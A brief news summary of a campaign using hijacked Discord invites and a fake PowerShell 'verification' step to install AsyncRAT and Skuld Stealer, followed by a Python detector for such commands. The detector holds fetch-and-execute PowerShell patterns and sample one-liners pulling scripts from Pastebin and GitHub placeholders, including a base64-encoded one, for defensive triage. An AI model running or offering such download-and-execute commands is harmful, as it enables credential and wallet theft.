Cybercriminals are hijacking expired Discord invite links to spread malware that steals crypto wallets and personal data. Victims are tricked into joining fake servers where they're asked to run a “verification” PowerShell command. This command launches a multi-stage malware attack using Pastebin and GitHub to bypass detection.
The malware includes tools like AsyncRAT and Skuld Stealer, allowing hackers to access devices, steal credentials, and extract wallet seed phrases. The attack has already affected users worldwide, especially in the U.S. and Europe.
Users are advised to avoid suspicious invite links, never run unknown scripts, and use strong endpoint protection.
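As an added illustration (not from the original article or any vendor's rule set), the following triage check for process-creation logs flags PowerShell command lines that fetch from Pastebin or GitHub hosts and then execute or encode the result. The host list, function names and sample command lines are assumptions constructed for this example.

```python
import base64
import re
from urllib.parse import urlparse

# Hosts for the two services the article names; the exact list is an assumption.
STAGING_HOSTS = {"pastebin.com", "github.com", "raw.githubusercontent.com",
                 "gist.githubusercontent.com"}
SHELL = re.compile(r"(?:^|[\\/])(?:powershell|pwsh)(?:\.exe)?$", re.I)
DOWNLOAD = re.compile(r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|"
                      r"downloadstring|downloadfile|net\.webclient)\b", re.I)
EXECUTE = re.compile(r"\b(?:invoke-expression|iex)\b", re.I)
ENCODED = re.compile(r"(?<!\w)-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL = re.compile(r"https?://[^\s'\"()|;]+", re.I)

def decode_encoded(cmd):
    """Return the UTF-16LE script behind -EncodedCommand, or '' if absent/invalid."""
    m = ENCODED.search(cmd)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else ""
    except ValueError:  # bad base64 (binascii.Error) or bad UTF-16 (UnicodeDecodeError)
        return ""

def assess(image, cmd):
    """Return the reasons one process-creation event matches the lure's pattern."""
    if not SHELL.search(image):
        return []
    decoded = decode_encoded(cmd)
    text = cmd + " " + decoded  # scan the visible and the decoded command together
    hosts = {(urlparse(u).hostname or "").lower() for u in URL.findall(text)}
    staged = sorted(hosts & STAGING_HOSTS)
    reasons = []
    if staged and DOWNLOAD.search(text):
        reasons.append("fetch:" + ",".join(staged))
    if EXECUTE.search(text):
        reasons.append("exec")
    if decoded:
        reasons.append("encoded")
    return reasons

def is_suspicious(image, cmd):
    """Alert only when a fetch from a staging host is also executed or encoded."""
    reasons = assess(image, cmd)
    return len(reasons) > 1 and reasons[0].startswith("fetch:")

# Constructed sample command lines (not from the article); EXAMPLE is a placeholder.
SAMPLE_PLAIN = 'powershell -c "iex (irm https://pastebin.com/raw/EXAMPLE)"'
SAMPLE_ENCODED = "powershell -enc " + base64.b64encode(
    "iex (irm https://raw.githubusercontent.com/EXAMPLE/x/main/a.ps1)".encode("utf-16-le")).decode()
SAMPLE_BENIGN = 'powershell -Command "Get-ChildItem C:\\Users"'
```

Legitimate installers also fetch scripts from GitHub this way, so a match is a triage signal to review rather than a verdict.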